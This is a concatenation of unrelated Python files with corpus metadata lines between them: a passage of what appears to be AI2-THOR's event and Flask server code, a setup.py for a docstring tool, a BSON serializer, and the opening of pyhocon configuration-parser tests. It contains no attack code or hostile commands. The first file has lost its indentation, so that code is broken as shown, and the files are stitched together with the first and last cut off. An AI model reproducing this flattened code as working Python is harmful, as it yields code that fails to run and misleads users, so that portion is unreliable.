warnings.warn("Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format")
return None
def process_visible_bounds2D(self):
if self.instance_detections2D and len(self.instance_detections2D) > 0:
for obj in self.metadata['objects']:
obj['visibleBounds2D'] = (obj['visible'] and obj['objectId'] in self.instance_detections2D)
def process_colors(self):
if 'colors' in self.metadata and self.metadata['colors']:
for color_data in self.metadata['colors']:
name = color_data['name']
c_key = tuple(color_data['color'])
self.color_to_object_id[c_key] = name
self.object_id_to_color[name] = c_key
def objects_by_type(self, object_type):
return [obj for obj in self.metadata['objects'] if obj['objectType'] == object_type]
def process_colors_ids(self):
if self.instance_segmentation_frame is None:
return
MIN_DETECTION_LEN = 0
self.instance_detections2D = {}
unique_ids, unique_inverse = unique_rows(self.instance_segmentation_frame.reshape(-1, 3), return_inverse=True)
unique_inverse = unique_inverse.reshape(self.instance_segmentation_frame.shape[:2])
unique_masks = (np.tile(unique_inverse[np.newaxis, :, :], (len(unique_ids), 1, 1)) == np.arange(len(unique_ids))[:, np.newaxis, np.newaxis])
#for unique_color_ind, unique_color in enumerate(unique_ids):
for color_bounds in self.metadata['colorBounds']:
color = np.array(color_bounds['color'])
color_name = self.color_to_object_id.get(tuple(int(cc) for cc in color), 'background')
cls = color_name
simObj = False
if '|' in cls:
cls = cls.split('|')[0]
simObj = True
bb = np.array(color_bounds['bounds'])
bb[[1,3]] = self.metadata['screenHeight'] - bb[[3,1]]
if not((bb[2] - bb[0]) < MIN_DETECTION_LEN or (bb[3] - bb[1]) < MIN_DETECTION_LEN):
if cls not in self.class_detections2D:
self.class_detections2D[cls] = []
self.class_detections2D[cls].append(bb)
color_ind = np.argmin(np.sum(np.abs(unique_ids - color), axis=1))
if simObj:
self.instance_detections2D[color_name] = bb
self.instance_masks[color_name] = unique_masks[color_ind, ...]
if cls not in self.class_masks:
self.class_masks[cls] = unique_masks[color_ind, ...]
else:
self.class_masks[cls] = np.logical_or(self.class_masks[cls], unique_masks[color_ind, ...])
def _image_depth(self, image_depth_data, **kwargs):
image_depth = read_buffer_image(image_depth_data, self.screen_width, self.screen_height)
depth_format = kwargs['depth_format']
image_depth_out = image_depth[:,:,0] + image_depth[:,:,1] / np.float32(256) + image_depth[:,:,2] / np.float32(256 ** 2)
multiplier = 1.0
if depth_format != DepthFormat.Normalized:
multiplier = kwargs['camera_far_plane'] - kwargs['camera_near_plane']
        # separate if (not elif): millimeters also needs the metric range applied first
        if depth_format == DepthFormat.Millimeters:
multiplier *= 1000
image_depth_out *= multiplier / 256.0
depth_image_float = image_depth_out.astype(np.float32)
if 'add_noise' in kwargs and kwargs['add_noise']:
depth_image_float = apply_real_noise(
depth_image_float,
self.screen_width,
indices=kwargs['noise_indices']
)
return depth_image_float
def add_image_depth_robot(self, image_depth_data, depth_format, **kwargs):
multiplier = 1.0
camera_far_plane = kwargs.pop('camera_far_plane', 1)
camera_near_plane = kwargs.pop('camera_near_plane', 0)
if depth_format == DepthFormat.Normalized:
multiplier = 1.0 / (camera_far_plane - camera_near_plane)
elif depth_format == DepthFormat.Millimeters:
multiplier = 1000.0
image_depth = read_buffer_image(
image_depth_data, self.screen_width, self.screen_height, **kwargs
).reshape(self.screen_height, self.screen_width) * multiplier
self.depth_frame = image_depth.astype(np.float32)
def add_image_depth(self, image_depth_data, **kwargs):
self.depth_frame = self._image_depth(image_depth_data, **kwargs)
def add_third_party_image_depth(self, image_depth_data, **kwargs):
self.third_party_depth_frames.append(self._image_depth(image_depth_data, **kwargs))
def add_third_party_image_normals(self, normals_data):
self.third_party_normals_frames.append(read_buffer_image(normals_data, self.screen_width, self.screen_height))
def add_image_normals(self, image_normals_data):
self.normals_frame = read_buffer_image(image_normals_data, self.screen_width, self.screen_height)
def add_third_party_image_flows(self, flows_data):
self.third_party_flows_frames.append(read_buffer_image(flows_data, self.screen_width, self.screen_height))
def add_image_flows(self, image_flows_data):
        self.flow_frame = read_buffer_image(image_flows_data, self.screen_width, self.screen_height)
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def add_image(self, image_data, **kwargs):
self.frame = read_buffer_image(image_data, self.screen_width, self.screen_height, **kwargs)
def add_image_ids(self, image_ids_data):
self.instance_segmentation_frame = read_buffer_image(image_ids_data, self.screen_width, self.screen_height)
self.process_colors_ids()
def add_third_party_image_ids(self, image_ids_data):
self.third_party_instance_segmentation_frames.append(read_buffer_image(image_ids_data, self.screen_width, self.screen_height))
def add_image_classes(self, image_classes_data):
self.class_segmentation_frame = read_buffer_image(image_classes_data, self.screen_width, self.screen_height)
def add_third_party_image_classes(self, image_classes_data):
self.third_party_class_segmentation_frames.append(read_buffer_image(image_classes_data, self.screen_width, self.screen_height))
def cv2image(self):
warnings.warn("Deprecated - please use event.cv2img")
return self.cv2img
@property
def cv2img(self):
return self.frame[...,::-1]
@property
def pose(self):
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = round(agent_meta['rotation']['y'] * 1000)
horizon = round(agent_meta['cameraHorizon'] * 1000)
return (round(loc['x'] * 1000), round(loc['z'] * 1000), rotation, horizon)
@property
def pose_discrete(self):
# XXX should have this as a parameter
step_size = 0.25
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = int(agent_meta['rotation']['y'] / 90.0)
horizon = int(round(agent_meta['cameraHorizon']))
return (int(loc['x'] / step_size), int(loc['z'] / step_size), rotation, horizon)
def get_object(self, object_id):
for obj in self.metadata['objects']:
if obj['objectId'] == object_id:
return obj
return None
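# Illustrative use of an Event in a controller loop (hedged: the Controller class lives in
# ai2thor.controller rather than this file, and the objectId string below is made up):
#
#   event = controller.step(action='MoveAhead')
#   event.frame.shape                     -> (screen_height, screen_width, 3)
#   event.metadata['agent']['position']   -> {'x': ..., 'y': ..., 'z': ...}
#   event.get_object('Mug|+00.25|+01.00|-00.50')   -> that object's metadata dict, or None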
class MultipartFormParser(object):
@staticmethod
def get_boundary(request_headers):
for h, value in request_headers:
if h == 'Content-Type':
ctype, ct_opts = werkzeug.http.parse_options_header(value)
boundary = ct_opts['boundary'].encode('ascii')
return boundary
return None
def __init__(self, data, boundary):
self.form = {}
self.files = {}
full_boundary = b'\r\n--' + boundary
view = memoryview(data)
i = data.find(full_boundary)
while i >= 0:
next_offset = data.find(full_boundary, i + len(full_boundary))
if next_offset < 0:
break
headers_offset = i + len(full_boundary) + 2
body_offset = data.find(b'\r\n\r\n', headers_offset)
raw_headers = view[headers_offset: body_offset]
body = view[body_offset + 4: next_offset]
i = next_offset
headers = {}
for header in raw_headers.tobytes().decode('ascii').strip().split("\r\n"):
k,v = header.split(':')
headers[k.strip()] = v.strip()
ctype, ct_opts = werkzeug.http.parse_options_header(headers['Content-Type'])
cdisp, cd_opts = werkzeug.http.parse_options_header(headers['Content-disposition'])
assert cdisp == 'form-data'
if 'filename' in cd_opts:
if cd_opts['name'] not in self.files:
self.files[cd_opts['name']] = []
self.files[cd_opts['name']].append(body)
else:
if ctype == 'text/plain' and 'charset' in ct_opts:
body = body.tobytes().decode(ct_opts['charset'])
if cd_opts['name'] not in self.form:
self.form[cd_opts['name']] = []
self.form[cd_opts['name']].append(body)
class DepthFormat(Enum):
Meters = 0,
Normalized = 1,
Millimeters = 2
class Server(object):
def __init__(
self,
request_queue,
response_queue,
host,
port=0,
threaded=False,
depth_format=DepthFormat.Meters,
add_depth_noise=False,
width=300,
height=300
):
app = Flask(__name__,
template_folder=os.path.realpath(
os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'templates')))
self.image_buffer = None
self.app = app
self.client_token = None
self.subscriptions = []
self.app.config.update(PROPAGATE_EXCEPTIONS=False, JSONIFY_PRETTYPRINT_REGULAR=False)
self.port = port
self.last_rate_timestamp = time.time()
self.frame_counter = 0
self.debug_frames_per_interval = 50
self.xwindow_id = None
self.wsgi_server = werkzeug.serving.make_server(host, self.port, self.app, threaded=threaded, request_handler=ThorRequestHandler)
# used to ensure that we are receiving frames for the action we sent
self.sequence_id = 0
self.last_event = None
self.camera_near_plane = 0.1
self.camera_far_plane = 20.0
self.depth_format = depth_format
self.add_depth_noise = add_depth_noise
self.noise_indices = None
if add_depth_noise:
assert width == height,\
"Noise supported with square dimension images only."
self.noise_indices = generate_noise_indices(width)
@app.route('/ping', methods=['get'])
def ping():
return 'pong'
@app.route('/train', methods=['post'])
def train():
if request.headers['Content-Type'].split(';')[0] == 'multipart/form-data':
form = MultipartFormParser(request.get_data(), MultipartFormParser.get_boundary(request.headers))
metadata = json.loads(form.form['metadata'][0])
token = form.form['token'][0]
else:
form = request
metadata = json.loads(form.form['metadata'])
token = form.form['token']
if self.client_token and token != self.client_token:
abort(403)
if self.frame_counter % self.debug_frames_per_interval == 0:
now = time.time()
# rate = self.debug_frames_per_interval / float(now - self.last_rate_timestamp)
self.last_rate_timestamp = now
# import datetime
# print("%s %s/s" % (datetime.datetime.now().isoformat(), rate))
if metadata['sequenceId'] != self.sequence_id:
raise ValueError("Sequence id mismatch: %s vs %s" % (
metadata['sequenceId'], self.sequence_id))
events = []
for i, a in enumerate(metadata['agents']):
e = Event(a)
image_mapping = dict(
image=e.add_image,
image_depth=lambda x: e.add_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane,
add_noise=self.add_depth_noise,
noise_indices=self.noise_indices
),
image_ids=e.add_image_ids,
image_classes=e.add_image_classes,
image_normals=e.add_image_normals,
image_flows=e.add_image_flows
)
for key in image_mapping.keys():
if key in form.files:
image_mapping[key](form.files[key][i])
third_party_image_mapping = dict(
image=e.add_image,
image_thirdParty_depth=lambda x: e.add_third_party_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane
),
image_thirdParty_image_ids=e.add_third_party_image_ids,
image_thirdParty_classes=e.add_third_party_image_classes,
image_thirdParty_normals=e.add_third_party_image_normals,
image_thirdParty_flows=e.add_third_party_image_flows
)
if a['thirdPartyCameras'] is not None:
for ti, t in enumerate(a['thirdPartyCameras']):
for key in third_party_image_mapping.keys():
if key in form.files:
third_party_image_mapping[key](form.files[key][ti])
events.append(e)
if len(events) > 1:
self.last_event = event = MultiAgentEvent(metadata['activeAgentId'], events)
else:
self.last_event = event = events[0]
for img in form.files.get('image-thirdParty-camera', []):
self.last_event.add_third_party_camera_image(img)
request_queue.put_nowait(event)
self.frame_counter += 1
next_action = queue_get(response_queue)
if 'sequenceId' not in next_action:
self.sequence_id += 1
next_action['sequenceId'] = self.sequence_id
else:
self.sequence_id = next_action['sequenceId']
resp = make_response(json.dumps(next_action, cls=NumpyAwareEncoder))
return resp
def start(self):
self.wsgi_server.serve_forever()
def set_init_params(self, init_params):
self.camera_near_plane = init_params['cameraNearPlane']
self.camera_far_plane = init_params['cameraFarPlane']
| 2.515625 | 3 |
setup.py | ooreilly/mydocstring | 13 | 3455 | <filename>setup.py
from setuptools import setup
setup(name='mydocstring',
version='0.2.7',
description="""A tool for extracting and converting Google-style docstrings to
plain-text, markdown, and JSON.""",
url='http://github.com/ooreilly/mydocstring',
author="<NAME>",
license='MIT',
packages=['mydocstring'],
install_requires=['mako', 'docopt'],
entry_points = {
'console_scripts': [
'mydocstring=mydocstring.docstring:main',
],},
package_data={'mydocstring': ['templates/google_docstring.md']},
zip_safe=False)
| 1.867188 | 2 |
anyser/impls/bson.py | Cologler/anyser-python | 0 | 3456 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <<EMAIL>>
# ----------
#
# ----------
import bson
import struct
from ..err import SerializeError
from ..abc import *
from ..core import register_format
@register_format('bson', '.bson')
class BsonSerializer(ISerializer):
format_name = 'bson'
def loadb(self, b: bytes, options: dict) -> Any:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.loads(b, **kwargs)
except Exception as e:
raise SerializeError(e)
def dumpb(self, obj, options: dict) -> bytes:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.dumps(obj, **kwargs)
except Exception as e:
raise SerializeError(e)
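# Illustrative round-trip sketch (hedged: exercised through the serializer class directly;
# the package may also expose a higher-level loads/dumps front end not shown in this file):
#
#   s = BsonSerializer()
#   payload = s.dumpb({'a': 1}, options={})
#   assert s.loadb(payload, options={}) == {'a': 1}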
| 2.28125 | 2 |
tests/test_config_parser.py | KevinMFong/pyhocon | 424 | 3457 | # -*- encoding: utf-8 -*-
import json
import os
import shutil
import tempfile
from collections import OrderedDict
from datetime import timedelta
from pyparsing import ParseBaseException, ParseException, ParseSyntaxException
import mock
import pytest
from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree)
from pyhocon.exceptions import (ConfigException, ConfigMissingException,
ConfigWrongTypeException)
try:
from dateutil.relativedelta import relativedelta as period
except Exception:
from datetime import timedelta as period
class TestConfigParser(object):
def test_parse_simple_value(self):
config = ConfigFactory.parse_string(
"""t = {
c = 5
"d" = true
e.y = {
f: 7
g: "hey dude!"
h: hey man
i = \"\"\"
"first line"
"second" line
\"\"\"
}
j = [1, 2, 3]
u = 192.168.1.3/32
g = null
}
"""
)
assert config.get_string('t.c') == '5'
assert config.get_int('t.c') == 5
assert config.get_float('t.c') == 5.0
assert config.get('t.e.y.f') == 7
assert config.get('t.e.y.g') == 'hey dude!'
assert config.get('t.e.y.h') == 'hey man'
assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', '']
assert config.get_bool('t.d') is True
assert config.get_int('t.e.y.f') == 7
assert config.get('t.j') == [1, 2, 3]
assert config.get('t.u') == '192.168.1.3/32'
assert config.get_int('t.g') is None
assert config.get_float('t.g') is None
assert config.get_string('t.g') is None
assert config.get_bool('t.g') is None
assert config.get_list('t.g') is None
assert config.get_config('t.g') is None
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_fail_parse_forbidden_characters(self, forbidden_char):
with pytest.raises(ParseBaseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['$', '"'])
def test_fail_parse_forbidden_characters_in_context(self, forbidden_char):
with pytest.raises(ParseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_parse_forbidden_characters_quoted(self, forbidden_char):
value = "hey man{}".format(forbidden_char)
config = ConfigFactory.parse_string('a: "{}"'.format(value))
assert config.get_string("a") == value
def test_parse_with_enclosing_brace(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: 5
}
}
"""
)
assert config.get_string('a.b') == '5'
@pytest.mark.parametrize('data_set', [
('a: 1 minutes', period(minutes=1)),
('a: 1minutes', period(minutes=1)),
('a: 2 minute', period(minutes=2)),
('a: 3 m', period(minutes=3)),
('a: 3m', period(minutes=3)),
('a: 3 min', '3 min'),
('a: 4 seconds', period(seconds=4)),
('a: 5 second', period(seconds=5)),
('a: 6 s', period(seconds=6)),
('a: 6 sec', '6 sec'),
('a: 7 hours', period(hours=7)),
('a: 8 hour', period(hours=8)),
('a: 9 h', period(hours=9)),
('a: 10 weeks', period(weeks=10)),
('a: 11 week', period(weeks=11)),
('a: 12 w', period(weeks=12)),
('a: 10 days', period(days=10)),
('a: 11 day', period(days=11)),
('a: 12 d', period(days=12)),
('a: 110 microseconds', period(microseconds=110)),
('a: 111 microsecond', period(microseconds=111)),
('a: 112 micros', period(microseconds=112)),
('a: 113 micro', period(microseconds=113)),
('a: 114 us', period(microseconds=114)),
('a: 110 milliseconds', timedelta(milliseconds=110)),
('a: 111 millisecond', timedelta(milliseconds=111)),
('a: 112 millis', timedelta(milliseconds=112)),
('a: 113 milli', timedelta(milliseconds=113)),
('a: 114 ms', timedelta(milliseconds=114)),
('a: 110 nanoseconds', period(microseconds=0)),
('a: 11000 nanoseconds', period(microseconds=11)),
('a: 1110000 nanosecond', period(microseconds=1110)),
('a: 1120000 nanos', period(microseconds=1120)),
('a: 1130000 nano', period(microseconds=1130)),
('a: 1140000 ns', period(microseconds=1140)),
])
def test_parse_string_with_duration(self, data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
def test_parse_string_with_duration_with_long_unit_name(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: 10 weeks
c: bar
"""
)
assert config['b'] == period(weeks=10)
def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: [a, 1, 10 weeks, 5 minutes,]
c: bar
"""
)
assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)]
def test_parse_with_enclosing_square_bracket(self):
config = ConfigFactory.parse_string("[1, 2, 3]")
assert config == [1, 2, 3]
def test_quoted_key_with_dots(self):
config = ConfigFactory.parse_string(
"""
"a.b.c.d": 3
t {
"d": {
"c": 5
}
}
k {
"b.f.d": 7
}
"""
)
assert config['"a.b.c.d"'] == 3
assert config['t.d.c'] == 5
assert config['k."b.f.d"'] == 7
def test_dotted_notation_merge(self):
config = ConfigFactory.parse_string(
"""
a {
b = foo
c = bar
}
a.c = ${a.b}" "${a.b}
a.d = baz
"""
)
assert config['a.b'] == "foo"
assert config['a.c'] == "foo foo"
assert config['a.d'] == "baz"
def test_comma_to_separate_expr(self):
config = ConfigFactory.parse_string(
"""
a=1,
b="abc",
c=the man,
d=woof,
a-b-c-d=test,
a b c d=test2,
"a b c d e"=test3
"""
)
assert config.get('a') == 1
assert config.get('b') == 'abc'
assert config.get('c') == 'the man'
assert config.get('d') == 'woof'
assert config.get('a-b-c-d') == 'test'
assert config.get('a b c d') == 'test2'
assert config.get('a b c d e') == 'test3'
def test_dict_merge(self):
config = ConfigFactory.parse_string(
"""
a {
d {
g.h.j.u: 5
g {
h.d: 4
}
g.h.k: f d
}
h.i.m = 7
h.i {
d: 5
}
h.i {
e:65
}
}
""")
expected_result = {
"a": {
"d": {
"g": {
"h": {
"j": {
"u": 5
},
"d": 4,
"k": "f d"
}
}
},
"h": {
"i": {
"m": 7,
"d": 5,
"e": 65
}
}
}
}
assert expected_result == config
def test_parse_with_comments(self):
config = ConfigFactory.parse_string(
"""
// comment 1
# comment 2
{
c = test // comment 0
g = 6 test # comment 0
# comment 3
a: { # comment 4
b: test, # comment 5
} # comment 6
t = [1, # comment 7
2, # comment 8
3, # comment 9
]
} # comment 10
// comment 11
// comment 12
"""
)
assert config.get('c') == 'test'
assert config.get('g') == '6 test'
assert config.get('a.b') == 'test'
assert config.get_string('a.b') == 'test'
assert config.get('t') == [1, 2, 3]
def test_missing_config(self):
config = ConfigFactory.parse_string(
"""
a = 5
"""
)
# b is not set so show raise an exception
with pytest.raises(ConfigMissingException):
config.get('b')
def test_parse_null(self):
config = ConfigFactory.parse_string(
"""
a = null
b = [null]
"""
)
assert config.get('a') is None
assert config.get('b')[0] is None
def test_parse_override(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
a.b {
c = 7
d = 8
}
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('a.b.d') == 8
def test_concat_dict(self):
config = ConfigFactory.parse_string(
"""
a: {b: 1}
a: {c: 2}
b: {c: 3} {d: 4} {
c: 5
}
"""
)
assert config.get('a.b') == 1
assert config.get('a.c') == 2
assert config.get('b.c') == 5
assert config.get('b.d') == 4
def test_concat_string(self):
config = ConfigFactory.parse_string(
"""
a = a b c
b = 5 b
c = b 7
"""
)
assert config.get('a') == 'a b c'
assert config.get('b') == '5 b'
assert config.get('c') == 'b 7'
def test_concat_list(self):
config = ConfigFactory.parse_string(
"""
a = [1, 2] [3, 4] [
5,
6
]
"""
)
assert config.get('a') == [1, 2, 3, 4, 5, 6]
assert config.get_list('a') == [1, 2, 3, 4, 5, 6]
def test_bad_concat(self):
ConfigFactory.parse_string('a = 45\n')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = [4] "4"')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = "4" [5]')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = {b: 5} "4"')
def test_string_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = ${a.b.c}
f = ${a.b.e}
}
"""
)
assert config1.get('a.b.c') == 'str'
assert config1.get('d') == 'str'
assert config1.get('f') == 'str '
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c}
f = test ${a.b.e}
}
"""
)
assert config2.get('a.b.c') == 'str'
assert config2.get('d') == 'test str'
assert config2.get('f') == 'test str '
config3 = ConfigFactory.parse_string(
u"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c} me
f = test ${a.b.e} me
}
"""
)
assert config3.get('a.b.c') == 'str'
assert config3.get('d') == 'test str me'
assert config3.get('f') == 'test str me'
def test_string_substitutions_with_no_space(self):
config = ConfigFactory.parse_string(
"""
app.heap_size = 128
app.java_opts = [
-Xms${app.heap_size}m
-Xmx${app.heap_size}m
]
"""
)
assert config.get('app.java_opts') == [
'-Xms128m',
'-Xmx128m'
]
def test_int_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = ${a.b.c}
}
"""
)
assert config1.get('a.b.c') == 5
assert config1.get('d') == 5
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c}
}
"""
)
assert config2.get('a.b.c') == 5
assert config2.get('d') == 'test 5'
config3 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c} me
}
"""
)
assert config3.get('a.b.c') == 5
assert config3.get('d') == 'test 5 me'
def test_cascade_string_substitutions(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = ${e}
}
}
d = test ${a.b.c} me
e = 7
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('d') == 'test 7 me'
def test_multiple_substitutions(self):
config = ConfigFactory.parse_string(
"""
a = 5
b=${a}${a}
c=${a} ${a}
"""
)
assert config == {
'a': 5,
'b': '55',
'c': '5 5'
}
def test_dict_substitutions(self):
config = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic} {name = "east"}
"""
)
assert config.get('data-center-east.cluster-size') == 6
assert config.get('data-center-east.name') == 'east'
config2 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
"""
)
assert config2.get('data-center-east.cluster-size') == 6
assert config2.get('data-center-east.name') == 'east'
config3 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }
"""
)
assert config3.get('data-center-east.cluster-size') == 9
assert config3.get('data-center-east.name') == 'east'
assert config3.get('data-center-east.opts') == '-Xmx4g'
config4 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
data-center-east-prod = ${data-center-east} {tmpDir=/tmp}
"""
)
assert config4.get('data-center-east.cluster-size') == 6
assert config4.get('data-center-east.name') == 'east'
assert config4.get('data-center-east-prod.cluster-size') == 6
assert config4.get('data-center-east-prod.tmpDir') == '/tmp'
config5 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic}
data-center-east = { name = "east" }
"""
)
assert config5['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
config6 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = { name = "east" }
data-center-east = ${data-center-generic}
"""
)
assert config6['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
def test_dos_chars_with_unquoted_string_noeol(self):
config = ConfigFactory.parse_string("foo = bar")
assert config['foo'] == 'bar'
def test_dos_chars_with_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = "5"')
assert config['foo'] == '5'
def test_dos_chars_with_triple_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = """5"""')
assert config['foo'] == '5'
def test_dos_chars_with_int_noeol(self):
config = ConfigFactory.parse_string("foo = 5")
assert config['foo'] == 5
def test_dos_chars_with_float_noeol(self):
config = ConfigFactory.parse_string("foo = 5.0")
assert config['foo'] == 5.0
def test_list_substitutions(self):
config = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = ${common_modules} [java]
"""
)
assert config.get('host_modules') == ['php', 'python', 'java']
config2 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules}
"""
)
assert config2.get('host_modules') == ['java', 'php', 'python']
config3 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
"""
)
assert config3.get('common_modules') == ['php', 'python']
assert config3.get('host_modules') == ['java', 'php', 'python', 'perl']
config4 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
full_modules = ${host_modules} [c, go]
"""
)
assert config4.get('common_modules') == ['php', 'python']
assert config4.get('host_modules') == ['java', 'php', 'python', 'perl']
assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go']
def test_list_element_substitution(self):
config = ConfigFactory.parse_string(
"""
main_language = php
languages = [java, ${main_language}]
"""
)
assert config.get('languages') == ['java', 'php']
def test_substitution_list_with_append(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC',
]
def test_substitution_list_with_append_substitution(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.default-jvm-opts = ["-XX:+UseParNewGC"]
application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC'
]
def test_non_existent_substitution(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent} abc
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent} def
"""
)
def test_non_compatible_substitution(self):
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = 55 ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} 55
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} aa
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
def test_self_ref_substitution_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = ${x} [3,4]
x = [-1, 0] ${x} [5, 6]
x = [-3, -2] ${x}
"""
)
assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6]
def test_self_append_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x += [3,4]
"""
)
assert config.get("x") == [1, 2, 3, 4]
def test_self_append_string(self):
'''
Should be equivalent to
x = abc
x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x = abc
x += def
"""
)
assert config.get("x") == "abc def"
def test_self_append_non_existent_string(self):
'''
Should be equivalent to x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x += def
"""
)
assert config.get("x") == " def"
def test_self_append_nonexistent_array(self):
config = ConfigFactory.parse_string(
"""
x += [1,2]
"""
)
assert config.get("x") == [1, 2]
def test_self_append_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1}
x += {b: 2}
"""
)
assert config.get("x") == {'a': 1, 'b': 2}
def test_self_append_nonexistent_object(self):
config = ConfigFactory.parse_string(
"""
x += {a: 1}
"""
)
assert config.get("x") == {'a': 1}
def test_self_ref_substitution_array_to_dict(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = {x: [3,4]}
x = {y: [5,6]}
x = {z: ${x}}
"""
)
assert config.get("x.x") == [3, 4]
assert config.get("x.y") == [5, 6]
assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]}
    def test_self_ref_substitution_dict_in_array(self):
config = ConfigFactory.parse_string(
"""
x = {x: [3,4]}
x = [${x}, 2, 3]
"""
)
(one, two, three) = config.get("x")
assert one == {'x': [3, 4]}
assert two == 2
assert three == 3
def test_self_ref_substitution_dict_path(self):
config = ConfigFactory.parse_string(
"""
x = {y: {z: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == {'z': 1}
assert config.get("x.z") == 1
